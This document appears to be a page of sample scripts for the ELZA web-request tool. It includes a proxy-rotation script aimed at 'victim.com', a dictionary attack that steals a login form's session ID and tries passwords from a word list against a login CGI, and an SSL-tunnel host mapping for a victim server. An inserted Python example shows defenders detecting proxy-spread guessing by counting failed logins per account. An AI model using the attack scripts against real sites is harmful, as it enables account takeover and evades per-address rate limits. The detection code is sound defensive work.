These are some samples of code that one may find useful:
1. PROXY ROTATION
# First, push values into PROXY and PORT. Each time we use one of
# those substs, the next available value is substituted.
subst PROXY @ proxy.domain1.com proxy.domain2.com proxy.domain3.com
subst PORT @ 3128 8080 80
# the BEFOREREQUEST proc is automatically executed before making
# a request to remote server. This allows us to set a proxy server.
proc BEFOREREQUEST
# Push the next available values from PROXY and PORT into
# the respective system variables
var proxy = PROXY
var port = PORT
endproc BEFOREREQUEST
# And now we do the requests we want to do. Each of them is piped
# through a different proxy server.
get url http://www.victim.com/page1.html
get url http://www.victim.com/page2.html
get url http://www.victim.com/page3.html
get url http://www.victim.com/page4.html
get url http://www.victim.com/page5.html
In this example, page1.html is requested through proxy.domain1.com on port
3128, page2.html through proxy.domain2.com:8080, and page3.html through
proxy.domain3.com:80. page4.html is requested again through the first proxy,
page5.html through the second, and so on. Cool, isn't it?
2. DICTIONARY ATTACK
This script serves as an example of how one can write a dictionary
attack using ELZA. I guess many web site administrators are not
THAT stupid after all. If they lock out an account after several wrong
passwords, you can do nothing.
# First, we define the static things
subst ACCOUNT = bozo
# We request the actual login form so that we can examine it
get url http://www.victim.com/loginform.html
# Then, we grab the very important session_id hidden form field,
# so that we pass it along with each of our login attempts.
field session_id $
# Then, we save the form field value we just grabbed into a subst
# so that we can use it in the future.
subst SID f= session_id
# Next, we define a procedure to be executed if our attack is
# successful.
proc SUCCESS
print WOW! Login: ACCOUNT, Password: CURRPASS
endproc SUCCESS
# Then, we define the procedure that tries to break in
proc TRYPASSWORD
# All necessary fields should be set before the request,
# because they are cleared after each request.
field username = ACCOUNT
field password = CURRPASS
# We set the session_id form field value we hijacked from the
# legitimate login form.
field session_id = SID
# And we do a POST to the login script
post url http://www.victim.com/cgi-bin/login.cgi
# Next, we check if we were successful and if we are,
# we call the SUCCESS procedure.
call SUCCESS if body != Login failed!
endproc TRYPASSWORD
# And finally, we define the main loop that is to execute the
# TRYPASSWORD for each password from our dictionary file (dict.txt)
call TRYPASSWORD CURRPASS % dict.txt
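As an added example that is not part of the original page or of ELZA, here is the defender's counterpart to the script above. It runs two detection rules over constructed login-audit lines (the log format, addresses and account names are hypothetical): counting failures per source address misses guessing that is spread across rotated proxies like the ones in section 1, while counting failures per account, which is the lockout the text mentions, catches it and also flags a success that arrives right after such a burst.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed login-audit lines (hypothetical format, not from the page): one
# guesser fails against "bozo" from three rotated proxy addresses and then
# succeeds; a legitimate user "alice" mistypes once.
SAMPLE_LOG = """\
2000-01-01T10:00:00Z src=198.51.100.1 user=bozo result=fail
2000-01-01T10:00:01Z src=198.51.100.2 user=bozo result=fail
2000-01-01T10:00:02Z src=198.51.100.3 user=bozo result=fail
2000-01-01T10:00:03Z src=198.51.100.1 user=bozo result=fail
2000-01-01T10:00:04Z src=198.51.100.2 user=bozo result=fail
2000-01-01T10:00:05Z src=198.51.100.3 user=bozo result=success
2000-01-01T10:00:06Z src=203.0.113.7 user=alice result=fail
2000-01-01T10:00:09Z src=203.0.113.7 user=alice result=success
"""
LINE_RE = re.compile(r"^(\S+) src=(\S+) user=(\S+) result=(\S+)$")

def parse(log_text):
    """Yield (timestamp, source, account, succeeded); skip malformed lines."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
            yield ts, m.group(2), m.group(3), m.group(4) == "success"

def analyze(log_text, key, threshold=5, window_seconds=60):
    """Sliding-window failure counter grouped by key(source, account). Returns
    (bursts, compromised): peak in-window failures per key, and keys where a
    success arrived while a burst of at least `threshold` was still open."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(list)           # key -> timestamps of recent failures
    bursts, compromised = {}, set()
    for ts, src, user, ok in parse(log_text):
        k = key(src, user)
        q = recent[k]
        while q and ts - q[0] > window:  # expire failures outside the window
            q.pop(0)
        if ok:
            if len(q) >= threshold:
                compromised.add(k)
            q.clear()                    # a success ends the failure streak
            continue
        q.append(ts)
        if len(q) >= threshold:
            bursts[k] = max(bursts.get(k, 0), len(q))
    return bursts, compromised

def per_source(log_text):   # naive rule: rotated proxies stay under it
    return analyze(log_text, key=lambda src, user: src)

def per_account(log_text):  # lockout-style rule: failures per account
    return analyze(log_text, key=lambda src, user: user)
```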
3. AVOIDING SPAWNING THE SSL TUNNEL REPEATEDLY
This should work as follows:
1. Spawn the tunnel before running the ELZA Script.
2. In the elza script, do a hostmap for the host you want to
connect to:
# Tell ELZA not to spawn tunnel when encountering https://
var honorhttps = no
# Tell ELZA to pipe all requests to secure-server.victim.com
# on port 443 to localhost, port 24242
hostmap secure-server.victim.com 443 localhost 24242
That is all for now. If you have a piece of code you would like to be
included, please pass it on to philip_stoev@iname.com.